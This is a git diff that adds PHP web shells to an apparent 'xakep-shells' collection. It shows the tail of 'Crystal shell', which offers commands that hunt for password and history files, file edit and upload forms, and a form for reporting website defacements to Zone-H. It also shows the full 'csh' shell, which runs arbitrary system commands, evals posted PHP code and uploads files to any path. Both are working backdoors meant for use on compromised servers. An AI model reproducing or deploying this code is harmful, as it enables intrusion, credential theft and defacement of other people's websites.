+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	<b>
+<font size=-2 face=verdana color="white">
+                  <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
+</p>
+ 					<?
+if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>ÇÓã ÇáãÚáä Defacer<br>ÇáãæÞÚ ÇáãÎÊÑÞ Victim<br>æÖÚ ÇáÇÎÊÑÇÞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode <br> ÓÈÈ ÇáÇÎÊÑÇÞ Attack Reason <br>áÇÑÓÇá ÇáÇÎÊÑÇÞ sand   <br> áÑÄíå ÇÎÑ ÇáÊÍÐíÑÇÊ ÇáãÑÓáå ÈÇáãæÞÚ Attacks On Hold</a>.</b>";}
+?>                 <p align="center"><font face="Verdana" color="#CC0000">
+                  <SCRIPT language=JavaScript type=text/javascript>
+        <!--
+        function validate(){
+            document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
+            document.notifyForm.submit();
+        }
+        //-->
+        </SCRIPT>
+
+                  Defacer </font></font></font>
+<font face=Verdana color=#CC0000>
+					Zone-h</font><FORM name=notifyForm
+                  action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
+                  method=post>
+                  <TABLE class=contentpane cellSpacing=0 cellPadding=0
+                  width="100%" border=0>
+                    <TBODY>
+                    <!-- DESCRIPTION -->
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
+                    </TBODY></TABLE>
+                  <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
+                    <TBODY>
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
+                        <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left width="15%"
+                              height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
+							::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
+							</font></TD>
+							<font size=-2 face=verdana color=white>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=23>Access credentials through Man In the
+							Middle attack</OPTION><OPTION value=22>Attack
+							against the administrator/user (password
+							stealing/sniffing)</OPTION><OPTION value=29>DNS
+							attack through cache poisoning</OPTION><OPTION
+                                value=28>DNS attack through social engineering</OPTION><OPTION value=17>
+							File Inclusion</OPTION><OPTION value=9>FTP Server
+							intrusion</OPTION><OPTION value=8>Mail Server
+							intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
+							Other Server intrusion</OPTION><OPTION value=18>
+							Other Web Application bug</OPTION><OPTION value=19>
+							Remote administrative panel access through
+							bruteforcing</OPTION><OPTION value=20>Remote
+							administrative panel access through password
+							guessing</OPTION><OPTION value=21>Remote
+							administrative panel access through social
+							engineering</OPTION><OPTION value=25>Remote service
+							password bruteforce</OPTION><OPTION
+                                value=24>Remote service password guessing</OPTION><OPTION value=26>
+							Rerouting after attacking the Firewall</OPTION><OPTION
+                                value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
+							RPC Server intrusion</OPTION><OPTION value=13>Shares
+							misconfiguration</OPTION><OPTION value=15>SQL
+							Injection</OPTION><OPTION value=10>SSH Server
+							intrusion</OPTION><OPTION value=11>Telnet Server
+							intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
+							Web Server external module intrusion</OPTION><OPTION
+                                value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=4>As a challenge</OPTION><OPTION
+                                value=1>Heh...just for fun!</OPTION><OPTION
+                                value=5>I just want to be the best defacer</OPTION><OPTION value=7>
+							Not available</OPTION><OPTION
+                                value=6>Patriotism</OPTION><OPTION
+                                value=3>Political reasons</OPTION><OPTION
+                                value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
+                        <TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
+							<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
+							</font></font>
+<font size=6 face=Webdings color="#FF0000">L </font><b>
+							<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
+							<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
+							</font>
+<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
+                        value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
+	: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
+  <TBODY>
+  <TR>
+    <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
+      <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
+        <TBODY>
+        <TR>
+          <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
+			2006</font></TD></TR><TR>
+          <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR>
+        <TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day>1 </TD></TR>
+        <TR>
+          <TD class=calendar_day>2 </TD>
+          <TD class=calendar_day>3 </TD>
+          <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
+        <TR>
+          <TD class=calendar_day>9 </TD>
+          <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
+          <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
+          <TD class=calendar_day>15 </TD></TR>
+        <TR>
+          <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
+          <TD class=calendar_day>21 </TD>
+          <TD class=calendar_current_day>22 </TD></TR>
+        <TR>
+          <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
+          <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
+  </TBODY></TABLE>
+
+        </div>
+
+
+</body></html>
diff --git a/xakep-shells/PHP/csh.php.php.txt b/xakep-shells/PHP/csh.php.php.txt
new file mode 100644
index 0000000..e9fd664
--- /dev/null
+++ b/xakep-shells/PHP/csh.php.php.txt
@@ -0,0 +1,334 @@
+<?php
+/****************************************************************
+*
+*	.::[csh]::. //(.::[c0derz]::. web-shell) v. 0.1.1 release
+*			 ----------------------------
+*       c0ded by: [vINT 21h]
+*       URL: http://c0derz.org.ua
+*       e-mail: vint21h@c0derz.org.ua
+*       ICQ: 255577736
+*
+****************************************************************/
+
+/***************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ****************************************************************/
+
+
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$achtung=1;
+//authentification
+$authentification = 1;
+$name='63a9f0ea7bb98050796b649e85481845';//root
+$pass='5cdbe638246729485a5eab6b93f170e2';//c0derz
+$caption="Enter your login and password";
+if ($authentification &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
+{
+    header("WWW-Authenticate: Basic realm=\"$caption\"");
+    header("HTTP/1.0 401 Unauthorized");
+    exit("<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888><h1>Error 401</h1><h2>Unauthorized access!</h2>");
+}
+if($achtung)
+  error_reporting(E_ALL&~E_NOTICE);
+else
+  error_reporting(0);
+  //---------------------
+
+//get page generating time
+if (!function_exists("get_micro_time")) {
+ function get_micro_time() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+ }
+}
+define("start_time",get_micro_time());
+$cshver="<a href=http://c0derz.org.ua target='_BLANK' title='.::[c0derz shell]::.'><b>.::[csh]::.</b></a> v. 0.1.1 release";
+ //-------------------------------
+
+ //normalize text encoding
+ function decode($buffer){
+return  convert_cyr_string ($buffer, 'd', 'w');
+}
+//---------------------------------
+
+?>
+
+<HTML>
+<HEAD>
+<meta http-equiv='pragma' content='no-cache'>
+
+<?php
+echo "<TITLE>.:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]</TITLE>";
+?>
+
+<STYLE>
+BODY{scrollbar-base-color: 000000;
+          scrollbar-face-color: #aaaaaa;
+          scrollbar-highlight-color: #dddddd;
+          scrollbar-shadow-color: #544554;
+          scrollbar-dark-shadow-color: #111111;
+          scrollbar-track-color: #222222;
+          scrollbar-arrow-color: #dcdddc}
+
+a:visited { color: #dcdcdc; text-decoration: none}
+A:active { color: #dcdcdc; text-decoration: none; }
+a:link {  color: #dcdcdc; text-decoration: none}
+a:hover {  color: #ff3333; text-decoration: none}
+
+BODY {
+scrollbar-face-color: transparent;
+scrollbar-shadow-color: transparent;
+scrollbar-highlight-color: transparent;
+scrollbar-3dlight-color: transparent;
+scrollbar-darkshadow-color: transparent;
+scrollbar-track-color: #777777;
+scrollbar-arrow-color: #777777;
+}
+</STYLE>
+</HEAD>
+<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888>
+<DIV align=center>
+<TABLE bordercolor=#000000 cellSpacing=1 width=950 bgColor=#000000 border=0 height=600>
+<hr>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667">
+<font size="1" face="verdana" color="#000000">
+<left>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+  <font size="1" face="verdana" color="#000000">
+
+<?php
+echo "<font size=1 face=verdana color=fcfcfc><b>Server info:</b></font><br>";
+?>
+
+ </td>
+ </tr>
+ </table>
+
+<?php
+//server info
+echo "Server name: <b><font color=#dcdcdc>".$SERVER_NAME."</b></font><br>";
+echo "Server IP adress:<b><font color=#dcdcdc>".$server_ip=gethostbyname($SERVER_NAME)."</b></font> <br>";
+echo (($safe_mode)?("Safe Mode: <font color=#ffffff><b>ON</b></font><br> "):
+         ("Safe Mode: <font color=#555555><b>OFF</b></font><br> "));
+echo "OS: <font color=#dcdcdc>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br>");
+ }else
+  echo $uname."</font><br>";
+  echo 'User: <font color=#dcdcdc>' .get_current_user() . '</font><br>';
+   echo "HTTP Server: <font color=#dcdcdc>".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."</font><br>";
+ echo ("PHP: <font color=#dcdcdc>".phpversion()."</font><br> ");
+  echo ("MySQL: ");
+ if($mysql_stat=function_exists('mysql_connect')){
+  echo "<font color=#ffffff><b>ON</b> </font><b>";
+ }
+ else {
+  echo "<font color=#555555><b>OFF</b> </font><br>";
+ }
+ //---------------------------
+ ?>
+
+ </td>
+ </tr>
+ </table>
+<tr>
+<td width="100" bgcolor="555555" valign="top">
+<center>
+<font face="tahoma" size="1" color="#000000"><div align="center"><b>.::[Shell functions]::.</b></div></font>
+<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="888888" onmouseover="this.style.backgroundColor='#677667';" onmouseout="this.style.backgroundColor='#888888';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=shell"?>" title="./$shell"><b>./ $shell</b></a><br>
+</td>
+ </tr>
+ </table>
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=phpcode"?>" title="PHP code execution">./php execution</a><br>
+</td>
+ </tr>
+ </table>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=upload"?>" title="Upload file to server">./ upload file</a><br>
+</td>
+ </tr>
+ </table>
+</div>
+<br>
+<br>
+<br>
+<br>
+<br>
+<td bgcolor="555555" valign="top" >
+<center>
+<div style="margin-top: 5;">
+<table width="98%" cellpadding="1" cellspacing="0">
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#fcfcfc">
+<b><?php echo$head_text;?><b>
+<tr>
+<td colspan="3" bgcolor="#677667" style="border-left: 1 solid #000000" style="border-bottom: 1 solid #000000" style="border-right: 1 solid #000000">
+<font face="Verdana" size="2" color="#000000">
+<br>
+<?php
+
+if (!empty($_GET['mode'])) {$mode = $_GET['mode'];}
+elseif (!empty($_POST['mode'])) {$mode = $_POST['mode'];}
+else {$mode = "shell";}
+
+switch($mode) {
+
+case "shell":
+$foot_stat="Current directory: <b><font color=#dcdcdc>[".getcwd()."]</font></b></tr>";
+$head_text="Shell:";
+chdir($dir);
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+   }
+  elseif(function_exists('system'))
+{
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+    echo passthru($com);
+   }
+}
+
+}
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+if (trim($buffer)){
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">Executed command: <b><font color=#dcdcdc>[$cmd]</font></b></form></td></tr></table></center><left><textarea cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+}
+echo "<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table><tr><td><font size=1 face=verdana color=000000>[".get_current_user()."@".$SERVER_NAME."]: </font><INPUT type=\"text\" name=\"cmd\" size=50 value=\"$cmd\" style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table>
+<table><tr><td><font size=1 face=verdana color=000000>Current directory: </font><INPUT type=\"text\" name=\"dir\" size=50 value=\"";
+echo getcwd();
+echo "\"style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
+<INPUT type=\"submit\" value=\"Change directory =>\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table></form></td></tr></table>";
+break;
+case "phpcode":
+$head_text="PHP code execution:";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><b>PHP code:</b></td></tr></table><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></textarea><br><br>
+<input type=\"submit\" name=\"submit\" value=\"                                     Execute PHP code =>                                     \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></form></center></div>";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><center><b>Results of PHP execution:</b></center>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</td></tr></table></center>";
+break;
+case "upload":
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<table>
+<font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form enctype=\"multipart/form-data\" action=\"$self\" method=\"POST\">
+<input type=\"hidden\" name=\"mode\" value=\"upload\">
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">File:</font></td>
+<td><input size=\"48\" name=\"file\" type=\"file\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td>
+</tr>
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">Path:</font></td>
+<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"><input type=\"submit\" value=\"Send\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></form></font></table></td></tr></table>";
+if (isset($_POST['path'])){
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" bgcolor=\"888888\"><font size=\"1\" face=\"verdana\" color=\"#000000\">";
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "File sucessfuly uploaded in to directory: <font color=ffffff>[$uploadfile]</font><br>";
+    echo "Name: <font color=ffffff>[".$_FILES['file']['name']. "]</font><br>";
+    echo "Size: <font color=ffffff>[" .$_FILES['file']['size']. "]</font> Bytes<br>";
+} else {
+    print "Couldn't to upload file. Information:<br>";
+    print_r($_FILES);
+}
+echo"</td></tr></table>";
+}
+break;
+}
+?>
+
+ </tr>
+  </td>
+ </tr>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#000000"><?echo $foot_stat;?>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
+ <tr>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
